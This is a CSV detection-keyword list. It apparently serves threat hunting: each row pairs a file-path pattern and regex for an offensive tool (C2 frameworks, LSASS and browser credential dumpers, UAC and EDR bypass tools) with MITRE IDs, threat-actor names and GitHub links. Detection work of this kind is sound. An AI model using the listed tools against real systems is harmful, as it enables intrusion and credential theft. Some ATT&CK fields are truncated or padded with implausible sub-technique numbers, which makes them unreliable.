"*/shad0w.py*",".{0,1000}\/shad0w\.py.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","10830"
"*/shad0w.scr*",".{0,1000}\/shad0w\.scr.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","10831"
"*/shad0w/beacon/beacon.dll*",".{0,1000}\/shad0w\/beacon\/beacon\.dll.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","10832"
"*/shadowcoerce.py*",".{0,1000}\/shadowcoerce\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","10833"
"*/shadowcoerce.py*",".{0,1000}\/shadowcoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10834"
"*/ShadowDumper.git*",".{0,1000}\/ShadowDumper\.git.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","10835"
"*/ShadowDumper/releases/download/*",".{0,1000}\/ShadowDumper\/releases\/download\/.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","10836"
"*/ShadowForgeC2*",".{0,1000}\/ShadowForgeC2.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","10837"
"*/ShadowHound.git*",".{0,1000}\/ShadowHound\.git.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","10838"
"*/ShadowSpray.exe*",".{0,1000}\/ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10849"
"*/ShadowSpray.git*",".{0,1000}\/ShadowSpray\.git.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","10850"
"*/ShadowSpray.git*",".{0,1000}\/ShadowSpray\.git.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","1","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","10851"
"*/ShadowSpray/*.cs*",".{0,1000}\/ShadowSpray\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","10852"
"*/ShadowStealer.git*",".{0,1000}\/ShadowStealer\.git.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","1","N/A","N/A","10","","N/A","","","","10853"
"*/ShadowTech Rat.exe*",".{0,1000}\/ShadowTech\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10854"
"*/share/gsocket/*",".{0,1000}\/share\/gsocket\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","10855"
"*/share/windows-resources/wce*",".{0,1000}\/share\/windows\-resources\/wce.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","#linux","N/A","8","4","N/A","N/A","N/A","N/A","10856"
"*/share_enum.py*",".{0,1000}\/share_enum\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10857"
"*/shareaudit.exe*",".{0,1000}\/shareaudit\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","10858"
"*/ShareAudit.git*",".{0,1000}\/ShareAudit\.git.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","10859"
"*/ShareAudit/releases/download/*",".{0,1000}\/ShareAudit\/releases\/download\/.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","10860"
"*/ShareFinder.cs*",".{0,1000}\/ShareFinder\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","10861"
"*/Sharefinder.ps1",".{0,1000}\/Sharefinder\.ps1","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","10862"
"*/shares-with-SCF.txt*",".{0,1000}\/shares\-with\-SCF\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","10863"
"*/sharklog.log*",".{0,1000}\/sharklog\.log.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#linux","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","10864"
"*/Sharp3389.exe*",".{0,1000}\/Sharp3389\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10865"
"*/SharpADWS.git*",".{0,1000}\/SharpADWS\.git.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","10866"
"*/SharpAllowedToAct.exe*",".{0,1000}\/SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10867"
"*/SharpAllowedToAct.exe*",".{0,1000}\/SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10868"
"*/SharpAltSecIds.exe*",".{0,1000}\/SharpAltSecIds\.exe.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","1","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","10869"
"*/SharpAltSecIds.git*",".{0,1000}\/SharpAltSecIds\.git.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","1","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","10870"
"*/SharpApplocker.exe*",".{0,1000}\/SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10871"
"*/SharpApplocker.exe*",".{0,1000}\/SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10872"
"*/SharpAppLocker.git*",".{0,1000}\/SharpAppLocker\.git.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","1","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","10873"
"*/SharpAVKB.exe*",".{0,1000}\/SharpAVKB\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10874"
"*/SharpAVKB.exe*",".{0,1000}\/SharpAVKB\.exe.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","1","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","10875"
"*/SharpAVKB.git*",".{0,1000}\/SharpAVKB\.git.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","1","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","10876"
"*/SharpAzbelt.git*",".{0,1000}\/SharpAzbelt\.git.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","1","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","10877"
"*/SharpBlackout.git*",".{0,1000}\/SharpBlackout\.git.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","10878"
"*/SharpBlock.exe*",".{0,1000}\/SharpBlock\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10879"
"*/SharpBruteForceSSH.git*","\/SharpBruteForceSSH\.git","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","10880"
"*/SharpBuster.dll*",".{0,1000}\/SharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","1","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","10881"
"*/SharpBuster.exe*",".{0,1000}\/SharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","1","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","10882"
"*/SharpBypassUAC.exe*",".{0,1000}\/SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10883"
"*/SharpBypassUAC.exe*",".{0,1000}\/SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10884"
"*/SharpBypassUAC.exe*",".{0,1000}\/SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10885"
"*/SharpC2*",".{0,1000}\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","10886"
"*/SharpCalendar/*.*",".{0,1000}\/SharpCalendar\/.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z","10887"
